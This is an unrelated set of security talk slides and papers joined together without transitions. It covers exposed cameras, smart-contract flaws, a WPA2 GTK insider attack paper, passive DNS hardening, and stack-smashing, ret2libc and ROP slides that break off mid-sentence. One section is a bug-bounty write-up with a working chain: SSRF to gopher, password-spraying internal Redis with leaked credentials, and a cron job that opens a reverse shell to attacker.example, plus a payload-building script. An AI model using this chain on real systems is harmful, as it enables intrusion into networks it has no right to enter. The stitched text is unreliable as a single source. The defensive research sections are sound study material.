Original Blogpost: Jan 10
My blogpost: Jan 24 (560 cameras)
BBC Article: Feb 7
A retest: April 3 ( 464 cameras)
US Media picks it up: mid April
Second Retest: May 24 ( 465 cameras)
Third Retest: July 12 (490 cameras)
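Counts like these are easy to re-run on a schedule with Shodan's official Python library; the API key and query string below are placeholders, not what produced the numbers above:

    import shodan

    api = shodan.Shodan("YOUR_API_KEY")  # placeholder key
    result = api.count("netcam")         # placeholder query
    print("exposed right now:", result["total"])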
It scales.
I’m working on it..
Wanna stalk me?
atenlabs.com/blog
@viss
Smart Contract Hacking
Konstantinos Karagiannis
CTO, Security Consulting, BT Americas
@KonstantHacker
when transactions aren’t enough
• “The key
component is this
idea of a Turing-
complete
blockchain”
• --Vitalik Buterin
meow—putting that computing to use
smart contracts
billions, or just millions, of reasons
problem isn’t going away
Solidity
dev tools
• .sol files > bytecode > blockchain
• Atom with plugins:
• language-ethereum
• etheratom
• Remix: browser based
oyente and Manticore
MAIAN
basic methodology
• Interview devs
• Review .sol file
• Try compiling
• Dissect code flow
• Run oyente (cross fingers)
• Run Manticore
• Run MAIAN
• Manually check for following vulns…
reentrancy
leave off the first “re-” for savings
reentrancy (and irony) in the dao code
default public – Parity wallet hack
initWallet
execute
Parity multisig wallet hack 2
Parity 2 transactions
not going with the (over)flow
2^256 - 1
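Solidity's unsigned integers silently wrap at that bound; a few lines of Python make the failure mode concrete (an illustration of the arithmetic, not EVM code):

    UINT256_MAX = 2**256 - 1

    def add_uint256(a, b):
        # models unchecked EVM addition: wraps instead of raising
        return (a + b) & UINT256_MAX

    print(add_uint256(UINT256_MAX, 1))  # 0 -- balance math gone wrong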
unchecked send in king of the ether
unchecked send
gas limits
withdraw don’t send
withdrawn not sent
encryption
transaction-ordering dependence
call-stack depth limit
variable or function ambiguity
odds and ends
• Timestamp dependence
• Business logic flaws
• Separating public/private
data
things might be getting better?
keep in touch
@KonstantHacker
Submitted in Defcon 18 2010
WPA Too!
Md Sohail Ahmad, AirTight Networks
[email protected]
Abstract
WPA2 is considered as the most secure configuration for WiFi networks. It is widely used to
secure enterprise and private WiFi networks. Interestingly, it is also being used to secure guest,
municipal and public WiFi networks. In this paper, we present a vulnerability of WPA2 protocol
which can be exploited by a malicious user to attack and compromise legitimate users. We also
present a few attack mitigation techniques which can be used to protect genuine WiFi users.
I.
Introduction
The IEEE 802.11i standard [1] specifies security protocols for WiFi networks. RSN is one of the security
configurations available in 802.11i and is popularly known as WPA2. WPA2 supports two types of
authentication - Pre-Shared Key (PSK) and IEEE 802.1x. For data encryption, WPA2 uses AES
though it also supports TKIP. TKIP stands for temporal key integrity protocol and is used by older
devices which are compliant with WEP encryption. AES stands for Advanced Encryption Standard.
Most of the current generation WiFi devices support AES.
A few attacks on WPA/WPA2 authentication and encryption that have been published in the
past are mentioned below:
PSK vulnerability [2]: PSK is vulnerable to eavesdropping and dictionary attack. To solve
PSK vulnerability, it is recommended to use the IEEE 802.1x based authentication.
PEAP vulnerability [3]: A WiFi client’s configuration related vulnerability was identified in
2008. It can be avoided by simply following good practices and by not ignoring certificate
validation check in client wireless configuration.
TKIP vulnerability [4]: The TKIP vulnerability allows an attacker to guess the IP address of the subnet
and then inject a few small frames to cause disruption in the network. Fast re-keying or
AES can be used to fix the vulnerability.
In the next section, we describe attacks based on a vulnerability of WPA2 protocol and discuss its
implications. Finally, we discuss a few solutions to mitigate the attacks.
II.
GTK Vulnerability
In WPA2, two types of keys are used for data encryption – PTK and GTK. PTK stands for
pairwise transient key and it is used to encrypt unicast data traffic. GTK stands for group temporal
key and it is used to encrypt group addressed data traffic. While PTK is derived on a per-association
basis, GTK is randomly generated by the AP and sent to all associated clients. GTK is a shared key
and is known to all associated clients.
Figure 1: All clients have same copy of GTK “K1”
The purpose of GTK is to be used as an encryption key in the AP and as a decryption key in clients.
A WiFi client never uses GTK to encrypt data frames, as all frames from client to AP are unicast
and destined to the AP. But a malicious WiFi client can alter its behavior to use GTK to encrypt group
addressed data frames of its own and send them to all associated clients.
By altering the role of GTK, a malicious client can inject any type of packet to mount attacks in a
WLAN, e.g. an ARP cache poisoning attack. The following attacks are possible on a WPA2 secured WiFi
network:
Attack 1: Stealth ARP cache poisoning/spoofing attack
It allows an attacker to snoop on the victim’s traffic. The attacker may place himself as a Man-in-the-middle
(MITM) and steal all of the victim’s sensitive information. The attacker may also launch a denial of service (DoS)
attack by not serving hosts after poisoning the ARP entry for the gateway in all wireless clients.
Figure 2: Stealth ARP poisoning
Step 1: Attacker injects fake ARP packet
to poison client’s cache for gateway.
Step 2: The ARP cache of victim gets
poisoned. For victim, Gateway
MAC is now attacker’s machine
MAC address. Victim’s machine
sends all traffic to attacker.
Step 3: Attacker can either drop traffic
or forward it to actual gateway.
Difference between Normal and Stealth mode ARP poisoning
In normal ARP poisoning [9], injected frames may appear on the wire via the AP as shown in the figure
below. The chance of being detected by wired monitoring tools is very high.
In stealth mode ARP poisoning, injected frames are invisible to the AP and never go on the wire. Hence it
can’t be detected by network based ARP cache monitoring tools.
Figure 3: Normal vs Stealth mode ARP poisoning
Attack 2: IP layer targeted attack
To launch a targeted attack, an IP packet is encapsulated in a group addressed data frame as shown
in Figure 4 below. A WiFi client machine whose IP address matches the destination IP
address present in the attack packet accepts the packet. All other WiFi clients reject the packet.
The technique can be used to mount several TCP and application layer attacks in a WPA2 secured
WLAN, e.g. TCP reset, TCP indirection, DNS manipulation, port scanning, malware injection,
privilege escalation, etc.
Figure 4: IP packet encapsulated into a group addressed IEEE 802.11 data frame
Replay Attack Detection in WPA2
A replay attack is detected with the help of the 48-bit packet number (PN) present in all CCMP encrypted
data frames. The steps used to detect a replayed frame are given below:
1. All clients learn the PN associated with a GTK at the time of association.
2. The AP sends a group addressed data frame to all clients with a new PN.
3. If the new PN > locally cached PN, the packet is decrypted and, after successful
decryption, the old PN is updated with the new PN.
Attack 3: Wireless DoS attack
The GTK vulnerability can also be exploited to launch a DoS attack in a WLAN.
To cause DoS, the attacker injects a forged group addressed data frame with a large packet
number (PN). All clients present in that network receive the forged group addressed data frame
and update their locally cached PN with the attacker-injected large PN.
Later on, when the AP sends group addressed data frames, they are dropped by the connected
clients, as the PNs present in the AP’s data frames are less than the locally cached PN in the
clients. The PN manipulation scenario is shown in Figure 5 below.
Figure 5: Packet Number (PN) manipulation
As a consequence of PN manipulation, broadcast ARP requests never reach the wireless clients.
This breaks IP-to-MAC resolution at the sender, and as a result IP-level communication between
sender and receiver never starts.
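The receiver-side check above can be sketched in a few lines (illustrative logic only, not driver code); note how a forged, inflated PN poisons the cache and turns the anti-replay rule into a DoS:

    def accept_group_frame(frame_pn, payload, cached_pn, decrypt):
        # anti-replay rule: only strictly increasing PNs are accepted
        if frame_pn <= cached_pn:
            return None, cached_pn        # dropped as a replay
        data = decrypt(payload)           # CCMP decryption, supplied by caller
        if data is not None:              # decryption succeeded
            cached_pn = frame_pn          # a forged, inflated PN lands here
        return data, cached_pn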
IV.
Attack mitigation
a. Client IDS
Client side IDS such as DecaffeinatID [11] or Snort [12] can be used to detect ARP cache
poisoning or any inbound connection or malware injection.
Limitations:
Such software is available only for Windows or Linux laptops, while WPA2
networks are accessed by a variety of client devices such as smartphones, notepads, etc.
(a) DecaffeinatID detects ARP cache poisoning
(b) PSPF / Client Isolation
Figure 6: Prevention techniques
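A minimal sketch of the kind of ARP watch such client-side tools perform, assuming Scapy is available (alerting and interface handling are left out):

    from scapy.all import ARP, sniff

    seen = {}  # IP -> MAC as first observed

    def check(pkt):
        if ARP in pkt and pkt[ARP].op == 2:  # op 2 = is-at (ARP reply)
            ip, mac = pkt[ARP].psrc, pkt[ARP].hwsrc
            if ip in seen and seen[ip] != mac:
                print("possible ARP poisoning:", ip, seen[ip], "->", mac)
            seen.setdefault(ip, mac)

    sniff(filter="arp", prn=check, store=0)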
b. PSPF or Client isolation [5][6]
The feature restricts peer to peer communication by blocking traffic between two WiFi
clients.
Limitations:
Not all controllers or standalone mode APs have PSPF or Client isolation capability.
The feature has known limitation. It does not work across access points for standalone
mode APs or across controllers for light weight access points.
c. Software based solution: Deprecate GTK
The WPA2 vulnerability can be fixed by deprecating the use of GTK. For backward
compatibility, the AP should send randomly generated, different GTKs to different clients so
that all associated clients have different copies of GTK at all times.
Limitations
a. Brings down network throughput
b. Requires AP software upgrade
VI.
Conclusion
WPA2 is vulnerable to insider attack. WPA, which was introduced as a replacement for WEP, is
also vulnerable, as group addressed data is handled the same way as it is handled in WPA2.
This limitation, though known to the designers of WPA and WPA2, is not well understood or
appreciated by WiFi users. Our findings presented in this paper show that exploits are possible
using off the shelf tools with minor modifications. Legitimate WiFi users who connect to WPA or
WPA2 enabled WLAN are vulnerable regardless of the type of authentication or encryption used
in the wireless network. In order to provide defense against the insider attack, a few solutions
have been proposed. Unfortunately, no workaround for the GTK vulnerability exists, and hence a
permanent fix is required at the protocol level. Fixing a protocol level problem takes time; as an
interim alternative, wireless monitoring devices, e.g. WIPS sensors, which are used to detect
anomalies in wireless traffic, can be used to detect the insider attack.
References
[1] Task Group I, IEEE P802.11i Draft 10.0. Project IEEE 802.11i, 2004.
[2] Aircrack-ng
www.aircrack-ng.org
[3] PEAP: Pwned Extensible Authentication Protocol
http://www.willhackforsushi.com/presentations/PEAP_Shmoocon2008_Wright_Antoniewicz.pdf
[4]. WPA/WPA2 TKIP Exploit: Tip of the Iceberg?
www.cwnp.com/pdf/TKIPExploit08.pdf
[5]. Cisco’s PSPF or P2P
http://www.cisco.com/en/US/products/hw/wireless/ps430/products_qanda_item09186a00806a4d
a3.shtml
[6] Client isolation
http://www.cisecurity.org/tools2/wireless/CIS_Wireless_Addendum_Linksys.pdf
[7]. The Madwifi Project
http://madwifi-project.org/
[8]. Host AP Driver
http://hostap.epitest.fi/
[9]. ARP Cache Poisoning
http://www.grc.com/nat/arp.htm
[10] Detecting Wireless LAN MAC Address Spoofing
http://forskningsnett.uninett.no/wlan/download/wlan-mac-spoof.pdf
[11]. DecaffeinatID
http://www.irongeek.com/i.php?page=security/decaffeinatid-simple-ids-arpwatch-for-
windows&mode=print
[12] SNORT
http://www.snort.org/
[13]. Wireless Hotspot Security
http://www.timeatlas.com/Reviews/Reviews/Wireless_Hotspot_Security | pdf |
Passive DNS Hardening
Robert Edmonds
Internet Systems Consortium, Inc.
Structure of this talk
▶ Introduction
▶ DNS
▶ Passive DNS
▶ ISC SIE
▶ DNS security issues
▶ Kashpureff poisoning
▶ Kaminsky poisoning
▶ Passive DNS security issues
▶ Record injection
▶ Response spoofing
▶ ISC DNSDB
▶ Architecture
▶ Demos
The Domain Name System
▶ “The DNS maps hostnames to IP addresses.”
▶ More generally, it maps (key, type) tuples to a set of
unordered values; we can think of the DNS as basically
a multi-value distributed key-value store.
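For example, one lookup against that key-value store with dnspython 2.x (the name queried is arbitrary):

    import dns.resolver

    # (key, type) = ("www.example.com", A); the answer is an unordered set
    for rdata in dns.resolver.resolve("www.example.com", "A"):
        print(rdata.address)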
Clients, caches, content
▶ Clients request full resolution service from caches.
▶ Caches make zero or more inquiries to DNS content servers
on behalf of clients. Results are cached for a limited time to
serve future client requests.
▶ Content nameservers serve DNS records for zones that have
been delegated to them.
DNS Caching Resolvers
(Figure: millions of clients send queries to DNS caching resolvers, which in turn
query content nameservers such as .org, .com, .net, isc.org, facebook.com,
google.com, amazon.com, and gtisc.gatech.edu; queries and responses flow on
both hops.)
Client-server and inter-server DNS protocols
▶ The DNS is actually two different protocols that share a
common wire format.
▶ The client-to-server protocol spoken between clients and
caches.
▶ The inter-server protocol spoken between caches and content
servers.
▶ Passive DNS focuses on the latter.
Passive DNS
▶ Passive DNS replication is a technology invented in 2004 by
Florian Weimer.
▶ Many uses! Malware, e-crime, legitimate Internet services all
use the DNS.
▶ Inter-server DNS messages are captured by sensors and
forwarded to a collection point for analysis.
▶ After being processed, individual DNS records are stored in a
database.
DNS Caching Resolvers
[Figure: the same client/cache/content picture, now with a passive DNS
sensor on the cache-to-content hop forwarding captured messages to the
Security Information Exchange and on into DNSDB.]
Passive DNS deployments
▶ Florian Weimer’s original dnslogger, first at RUS-CERT,
then at BFK.de (2004–).
▶ Bojan Zdrnja’s dnsparse (2006–).
▶ ISC’s Security Information Exchange (2007–).
ISC Security Information Exchange
▶ SIE is a distribution network for different types of security
data.
▶ One of those types of data is passive DNS.
▶ Sensor operators upload batches of data to SIE.
▶ Data is broadcast onto private VLANs.
▶ NMSG format is used to encapsulate data.
▶ Has a number of features which make it very useful for storing
passive DNS data, but won’t be covered further.
▶ See our Google Tech Talk for more information:
http://www.isc.org/community/presentations/video.
DNS Security Issues
▶ Passive DNS captures both signed and unsigned data, so
DNSSEC cannot help us.
▶ What security issues are there in the DNS that are relevant to
passive DNS?
▶ Kashpureff poisoning
▶ Kaminsky poisoning
▶ (Actually, just response spoofing in general.)
Kashpureff poisoning
▶ Kashpureff poisoning is the name given to a particular type of
DNS cache poisoning.
▶ The attacker runs a content nameserver.
▶ A client is enticed to lookup a domain name under the
attacker’s control.
▶ The cache contacts the attacker’s nameserver.
▶ The attacker’s nameserver provides extra records to the cache.
▶ The extra records are inserted into the cache instead of being
discarded.
Kashpureff poisoning example
Q: malicious.example.com.   IN A    ?
R: malicious.example.com.   IN NS   www.example.net.
R: www.example.net.         IN A    203.0.113.67
Kashpureff hardening
▶ 1997: Eugene Kashpureff hijacks the InterNIC website.
▶ BIND 4.9.6 and 8.1.1 introduce hardening against
Kashpureff poisoning.
▶ RFC 2181 is published.
▶ See §5.4.1 “Ranking data” for details.
Lack of entropy
▶ 2000: DJB observes that a maximum of only about 31-32 bits
of entropy can protect a UDP DNS query.
▶ Other DNS implementations were slow to adopt SPR (source port randomization).
▶ 32 bits of entropy particularly weak for a session ID due to the
birthday attack problem.
▶ Newer protocols use cryptographically secure session IDs with
64, 128, or more bits.
Kaminsky poisoning
▶ 2008: Dan Kaminsky notices that the TTL can be bypassed.
▶ Coordinated, multi-vendor patches are released to implement
source port randomization.
▶ SPR makes Kaminsky attacks harder, but not impossible.
Relevance to passive DNS
▶ Weimer’s 2005 paper notes several problems with verifying
passive DNS data.
▶ Kashpureff and Kaminsky poisoning of “active DNS” have
analogues in passive DNS.
▶ Passive DNS sensors can’t see the DNS cache’s “bailiwick”,
leading to record injection.
▶ Spoofed responses are treated just like normal responses.
▶ A single spoofed response can poison the passive DNS
database!
▶ Goal: make passive DNS at least as reliable as active
DNS.
Protecting the capture stage against response spoofing
▶ Capture both queries and responses.
▶ Correlate responses with previously seen queries.
▶ The DNS message 9-tuple:
1. Initiator IP address
2. Initiator port
3. Target IP address
4. Target port
5. Internet protocol
6. DNS ID
7. Query name
8. Query type
9. Query class
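A rough sketch of the correlation this enables; field and constant names are illustrative, not ISC's actual libnmsg API:

from collections import OrderedDict

PENDING = OrderedDict()   # bounded table of outstanding queries

def key_from_query(p):
    return (p.src_ip, p.src_port, p.dst_ip, p.dst_port,
            p.proto, p.dns_id, p.qname, p.qtype, p.qclass)

def on_query(p):
    PENDING[key_from_query(p)] = p
    if len(PENDING) > 100_000:
        PENDING.popitem(last=False)     # expired -> UDP_UNANSWERED_QUERY

def on_response(p):
    # a response swaps initiator and target relative to its query
    key = (p.dst_ip, p.dst_port, p.src_ip, p.src_port,
           p.proto, p.dns_id, p.qname, p.qtype, p.qclass)
    if PENDING.pop(key, None) is not None:
        return "UDP_QUERY_RESPONSE"     # matched: keep
    return "UDP_UNSOLICITED_RESPONSE"   # spoof candidate: discard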
nmsg/dnsqr
▶ dnsqr is a message module for ISC’s libnmsg specifically
designed for passive DNS capture.
▶ UDP DNS transactions are classified into three categories:
1. UDP_QUERY_RESPONSE
2. UDP_UNANSWERED_QUERY
3. UDP_UNSOLICITED_RESPONSE
▶ Performs IP reassembly, too!
Protecting the analysis stage against record injection
▶ Caches internally associate a “bailiwick” with each outgoing
query.
▶ The cache knows what bailiwick to use, because it knows why
it’s sending a particular query.
▶ We have to calculate the bailiwick ourselves.
▶ Protection against record injection requires protection against
spoofed responses.
▶ (Otherwise, an attacker could just spoof the record and the
source IP address of an in-bailiwick nameserver.)
Passive DNS bailiwick algorithm
▶ Must operate completely passively.
▶ Must provide a boolean true or false for each record.
▶ “For each record name, is the response IP address a
nameserver for the zone that contains or can contain this
name?”
▶ Example: root nameservers can assert knowledge about any
name!
▶ Example: Verisign’s gtld servers can assert knowledge about
any domain name ending in .com or .net.
Passive DNS bailiwick algorithm
▶ Initialize bailiwick cache with a copy of the root zone.
▶ Cache starts off with knowledge of which servers serve the root
and TLDs.
▶ Find all potential zones that a name could be located in.
▶ Check whether any of the nameservers for those zones are the
nameserver that sent the response.
▶ Each time an NS, A, or AAAA record is verified by the
algorithm, it is inserted into the bailiwick cache.
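A toy sketch of the check (cache layout and seed data are assumptions, not ISC's implementation):

bailiwick_cache = {".": {"a.root-servers.net."},
                   "com.": {"a.gtld-servers.net."}}   # zone -> NS names
addr_cache = {"a.gtld-servers.net.": {"192.5.6.30"}}  # NS name -> verified IPs

def potential_zones(name):
    # "www.example.com." -> ["www.example.com.", "example.com.", "com.", "."]
    labels = name.rstrip(".").split(".")
    return [".".join(labels[i:]) + "." for i in range(len(labels))] + ["."]

def in_bailiwick(record_name, responding_ip):
    for zone in potential_zones(record_name):
        for ns in bailiwick_cache.get(zone, ()):
            if responding_ip in addr_cache.get(ns, ()):
                return True   # verified NS/A/AAAA records may now be cached
    return False

print(in_bailiwick("example.com.", "192.5.6.30"))   # True, via com./NS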
Passive DNS bailiwick algorithm example
Name: example.com.
Server: 192.5.6.30
▶ Potential zones:
▶ example.com.
▶ com.
▶ .
▶ Zones in bailiwick cache:
▶ com.
▶ .
▶ Check: example.com./NS? Not found.
▶ Check: com./NS? Found 13 nameservers.
▶ Check: are any of them 192.5.6.30? Yes.
Passive DNS bailiwick algorithm example
com.                  IN  NS  a.gtld-servers.net.
a.gtld-servers.net.   IN  A   192.5.6.30
Passive DNS bailiwick algorithm example
;; QUESTION SECTION:
;www.example.com.            IN  A

;; AUTHORITY SECTION:
example.com.         172800  IN  NS  a.iana-servers.net.
example.com.         172800  IN  NS  b.iana-servers.net.

;; ADDITIONAL SECTION:
a.iana-servers.net.  172800  IN  A   192.0.34.43
b.iana-servers.net.  172800  IN  A   193.0.0.236

;; SERVER: 192.5.6.30#53(192.5.6.30)
Passive DNS bailiwick algorithm example
;; QUESTION SECTION:
;www.example.com.            IN  A

;; ANSWER SECTION:
www.example.com.     172800  IN  A   192.0.32.10

;; AUTHORITY SECTION:
example.com.         172800  IN  NS  a.iana-servers.net.
example.com.         172800  IN  NS  b.iana-servers.net.

;; SERVER: 192.0.34.43#53(192.0.34.43)
Passive DNS bailiwick algorithm example
Name: www.example.com.
Server: 192.0.34.43
▶ Potential zones:
▶ www.example.com.
▶ example.com.
▶ com.
▶ .
▶ Zones in bailiwick cache:
▶ example.com.
▶ com.
▶ .
▶ Check: www.example.com./NS? Not found.
▶ Check: example.com./NS? Found 2 nameservers.
▶ Check: are any of them 192.0.34.43? Yes.
DNSDB
▶ DNSDB is a database for storing DNS records.
▶ Data is loaded from passive DNS and zone files.
▶ Individual DNS records are stored in an Apache Cassandra
database.
▶ Offers key-value store distributed across multiple machines.
▶ Good fit for DNS data.
▶ Sustains extremely high write throughput because all writes
are sequential.
▶ Offers a RESTful HTTP API and web search interface.
▶ Database currently consumes about 500 GB out of 27 TB.
Architecture
▶ Components
▶ Data sources
▶ nmsg-dns-cache
▶ DNS TLD zones (FTP via ZFA programs): com, net, org,
etc.
▶ DNS zones (standard AXFR/IXFR protocol)
▶ Data loaders
▶ Deduplicated passive DNS
▶ Zone file data
Data source: nmsg-dns-cache
▶ Reads raw DNS responses from passive DNS.
▶ Parses each DNS message into individual DNS RRsets.
▶ Series of filters reduce the total amount of data by about 50%.
▶ RRsets are then inserted into an in-memory cache.
▶ Cache is expired in FIFO order.
▶ When RRsets expire from the cache, they form the final
nmsg-dns-cache output.
Data source: zone files
▶ gTLD Zone File Access programs: com, net, org, info,
biz, name
▶ AXFR'd zones: isc.org, a few other "test" zones.
DNSDB
[Architecture figure: passive DNS sensors upload to SIE submit servers; the
SIE switch fabric broadcasts a raw data VLAN, which nmsg-dns-cache filters
and dedupes onto a filtered/deduped data VLAN feeding DNSDB. Zone data is
loaded alongside: ZFA for .COM/.BIZ/.ORG via an FTP collector, and an
AXFR/IXFR collector for ISC.ORG, GTISC.GATECH.EDU and other DNS zones.
DNSDB is exposed through a web interface and an HTTP API.]
Example #1: *.google.com
[Demo screenshots: DNSDB web interface and query results, not reproduced here.]
0x00 Preface
For technical discussion or penetration testing training, feel free to reach out via QQ/VX: 547006660.
For code audit, penetration testing, or red/blue team engagements, you can contact our company.
We also run a 2000-member network security group; everyone is welcome. Group number: 820783253.
I've been doing a lot of bug bounty hunting lately, but most of the findings were trivial; bugs that actually require some thought are rare.
Today I ran into a really good case, hence this write-up.
0x01 Batch-fuzzing directories reveals a hidden endpoint
I had been hunting this big vendor for almost two weeks; work has been busy, so I hadn't dug in much recently.
But I kept ffuf running with a wordlist, batch-scanning directories across the vendor's assets. Today I checked the scan results on the server, and there it was.
The endpoint is: https://xxx.xxxx.com/xxxx/start
Accessing it directly,
we see that the endpoint lists some usable API links.
After testing each one in turn, an endpoint named face_xxxx looked promising.
0x02 Fuzzing the request format and parameters
Accessing the endpoint returns "Method Not Allowed" (HTTP 405), so clearly we need to switch to POST.
POSTing an arbitrary parameter, the endpoint replies "Request error, content-type was unsupported".
Good; keep fuzzing the Content-Type header (remember to disable payload_processing auto-encoding).
Fuzzing shows that a Content-Type of application/json works. From here it's simple: construct JSON data and keep fuzzing the JSON parameter names.
0x03 SSRF, no brainer
The parameter is image_url; anyone with a little experience can guess that this parameter most likely fetches a remote image.
So we test for SSRF directly.
Our server received the request, and testing shows that gopher, dict, http and other common protocols are all usable~
Previously, through Spring (Actuator) leaks in various subdomains' second-level directories or web roots, I had downloaded heapdump files and recovered plaintext Redis passwords with OQL queries.
I had collected quite a few of the vendor's internal Redis IPs and passwords, and learned the internal network ranges as well.
With this SSRF we can batch password-spray the internal Redis instances and pop reverse shells to breach the perimeter.
0x04 Using the gopher protocol to batch password-spray internal Redis and get reverse shells
Quick primer: unlike an unauthenticated Redis instance, a password-protected Redis requires an extra -a argument when connecting from the command line.
As shown in the figure, without the password no Redis command can be executed.
With password authentication enabled, the RESP protocol traffic looks as follows:
the authentication adds an extra AUTH command to the stream.
Write a script to build the gopher payload, making sure this AUTH is included, then use the usual cron-job trick to get a reverse shell.
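A rough sketch of such a payload builder (the target address, password, and callback host below are placeholders):

from urllib.parse import quote

def resp(*args):                     # serialize one RESP command
    out = "*%d\r\n" % len(args)
    for a in args:
        out += "$%d\r\n%s\r\n" % (len(a), a)
    return out

cron = "\n\n*/1 * * * * bash -i >& /dev/tcp/attacker.example/4444 0>&1\n\n"
cmds = (resp("AUTH", "P@ssw0rd")     # the extra AUTH for protected Redis
        + resp("SET", "x", cron)
        + resp("CONFIG", "SET", "dir", "/var/spool/cron/")
        + resp("CONFIG", "SET", "dbfilename", "root")
        + resp("SAVE"))

print("gopher://10.0.0.5:6379/_" + quote(cmds))   # goes into image_url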
Using the SSRF found above, together with the internal Redis passwords and weak network ranges collected earlier,
I ran Burp Intruder against the vendor's internal ranges to password-spray Redis in bulk; whenever a spray succeeds, the cron job gets written.
Hard work pays off: one subnet alone returned a dozen or so shells...
The vendor's internal Redis hosts could even reach the internet; their internal network security was a mess.
0x05 Epilogue
I found this bug on Christmas Eve~ call it a Christmas present.
Drinking from LETHE:
New methods of exploiting and mitigating
memory corruption vulnerabilities
Daniel Selifonov
DEF CON 23
August 7, 2015
Show of Hands
1. Have you written programs in C or C++?
2. Have you implemented a classic stack smash
exploit?
3. … a return-to-libc or return-oriented-
programming exploit?
4. … a return-to-libc or ROP exploit that used
memory disclosure or info leaks?
Motivations
● Software is rife with
memory corruption
vulnerabilities
● Most memory corruption
vulnerabilities are directly
applicable to code
execution exploits
● And there's no end in
sight...
Motivations (II)
● Industrialized
ecosystem of
vulnerability
discovery and
brokering
weaponized exploits
● Little of this discovery
process feeds into
fixes...
The other AFL
Motivations (III)
● State actor (e.g. NSA
Tailored Access
Operations group)
budgets: ≈ $∞
● Bug bounties just
drive up prices
● Target supply, not
demand for exploits...
The Plan
● Sever the path between
vulnerability and
(reliable) exploit
● Why do programmers
keep hitting this
fundamental blindspot?
● Defenses are born in
light of attack strategies
Memory Safety
#include <stdio.h>
int main() {
  foo();
  bar(11, 12);
  return 0;
}
void foo() {
  int a;
  char b[23];
  gets(b);
  printf("Hey %s!\n",b);
}
int bar(int x, int y) {
  return x + y;
}
[Animation builds collapsed: the original slides step through the call stack
frame by frame as main() calls foo(), foo() calls gets() and printf(), and
the frames unwind again. At its deepest point the stack holds:]
<return address to C runtime exit>
<return address to …>
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>   (x6: 23 bytes rounded up to 24)
<return address to …>
Part II:
Code Injection
Smashing the Stack (1996)
#include <stdio.h>
int main() {
  foo();
  bar(11, 12);
  return 0;
}
void foo() {
  int a;
  char b[23];
  gets(b);
  printf("Hey %s!\n",b);
}
int bar(int x, int y) {
  return x + y;
}
[Animation builds collapsed: gets(b) copies attacker input past the end of
b, writing over 'int a' and the saved return addresses above it:]
<return address to …>              <- overwritten by the overflow
<return address to C runtime exit>
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>   (x6)
<return address to …>
Paging/Virtual Memory
0xdeadbeef = 11011110101011011011111011101111
           = 1101111010 (890) | 1011011011 (731) | 111011101111 (3823)
             page directory      page table         byte offset
             index               index              within the page
[Animation builds collapsed:]
CR3 -> Page Directory (1024 entries) -> PDE
PDE -> Page Table (1024 entries)     -> PTE
PTE -> Page (4096 bytes)             -> Byte at offset 3823
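A quick check of that split (a sketch, not part of the original deck):

addr = 0xdeadbeef
pd_index    = (addr >> 22) & 0x3FF   # top 10 bits  -> 890
pt_index    = (addr >> 12) & 0x3FF   # next 10 bits -> 731
page_offset = addr & 0xFFF           # low 12 bits  -> 3823
print(pd_index, pt_index, page_offset)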
Page Table Entries
Bits 31..0: the physical address of the next level, plus flag bits
including Read/Write and User/Supervisor.
Paging made fast: TLB
0xdeadbeef = 1101111010 (890) | 1011011011 (731) | offset
[Animation builds collapsed: instead of repeating the two-level walk, the
high bits are matched against a cached translation covering the whole
4096-byte page.]
TLB Entry: Virtual Address -> Physical Address + Aggregate Permissions
PaX PAGEEXEC (2000)
The User/Supervisor bit emulates Non-Exec. The CPU keeps separate
Instruction and Data TLBs, each caching (Virtual Addr, Physical Addr,
Permission); the Instruction Pointer tells the fault handler which kind of
access faulted.
PaX Page Fault Strategy:
if (supervisor page &&
    IP on faulting page) {
  Terminate
} else {
  Set user page in PTE
  Prime Data TLB
  Set supervisor page in PTE
}
[Animation builds collapsed: data pages are marked supervisor so the first
access always faults. A legitimate data access gets the Data TLB primed and
the page flipped back to supervisor; an instruction fetch (IP on the
faulting page) means code execution from a data page, and the process is
terminated.]
Page Level Permissions
For mapped pages:
                 User                  Supervisor (PaX/NX)
Not-Writable     Read/Execute          Read
Writable         Read/Write/Execute    Read/Write
Part III:
Code Reuse
Return to libc (1997)
Classic code-injection payload (what non-executable stacks kill):
...
<Shell code>
<nop> <nop> <nop> <nop>   (sled)
<smashed return address into the nop sled>

ret2libc payload: reuse code that is already executable:
...
"/bin/bash"
<pointer to "/bin/bash">
<dummy value>              (fake return address for system())
<smashed ret to libc system()>
...
<vulnerable buffer>

[Build collapsed: when foo() returns, execution lands in system(), which
sees a normal-looking frame:]
...
<pointer to "/bin/bash">
<saved return address>
<local variables for system()>
...
Return Oriented Programming ('07)
Chain short instruction sequences ("gadgets") that each end in ret:
  push eax ; ret          pop eax ; ret          pop ebx ; ret
  mov [ebx],eax ; ret     xchg ebx,esp ; ret     pop edi ; pop ebp ; ret
The stack becomes the program:
...
<argument popping gadget addr>
<argument 2>
<argument 1>
<argument popping gadget addr>
<gadget addr 2>
<argument 2>
<argument 1>
<argument popping gadget addr>
<gadget addr 1>
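A hedged sketch of packing such a chain; the gadget addresses are hypothetical and would be harvested from the target binary in practice:

import struct

POP_EAX_RET = 0x080484a1    # pop eax ; ret   (placeholder addresses)
POP_EBX_RET = 0x080484b3    # pop ebx ; ret
MOV_MEM_RET = 0x080484c7    # mov [ebx], eax ; ret

chain  = struct.pack("<I", POP_EAX_RET) + struct.pack("<I", 0x6e69622f)  # "/bin"
chain += struct.pack("<I", POP_EBX_RET) + struct.pack("<I", 0x0804a000)  # scratch addr
chain += struct.pack("<I", MOV_MEM_RET)          # write the dword to memory
payload = b"A" * 27 + chain   # filler sized for the vulnerable frame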
Address Space Layout
Randomization (2003)
[Figure collapsed: two runs of the same process, each placing the Program
Code, Libraries A/B/C, mmap region, Heap, and Stack at different randomized
positions between 0...00 and f...ff.]
Part IV:
Memory Disclosure
&
Advanced Code Reuse
Offset Fix Ups
libc is randomized as one contiguous block, so library-relative offsets
survive ASLR:
  library-relative 0..23: location of system()
  library-relative 0..46: location of printf()
[Builds collapsed: leak a single randomized virtual address, say printf()
at 0xdefc0b46, and every other address follows: system() must be at
0xdefc0b23.]
Fine Grained ASLR
● Smashing the Gadgets (2012)
● Address Space Layout Permutation (2006)
Function level FG-ASLR: the order of functions inside a library is permuted
on every load (lib-func-a/b/c/d/f land in a different order each time).
Instruction level FG-ASLR: equivalent code with different register
assignments, e.g.:
mov eax, [ebp-4]       mov edx, [ebp-4]
mov ebx, [ebp-8]       mov esi, [ebp-8]
add eax, ebx           add edx, esi
xor ecx, ecx           xor edi, edi
push eax               push edx
push ebx               push esi
push ecx               push edi
call foo               call foo
Just-in-Time Code Reuse (2013)
Start from one leaked code pointer (0xdeadbeef) plus a memory-disclosure
primitive:
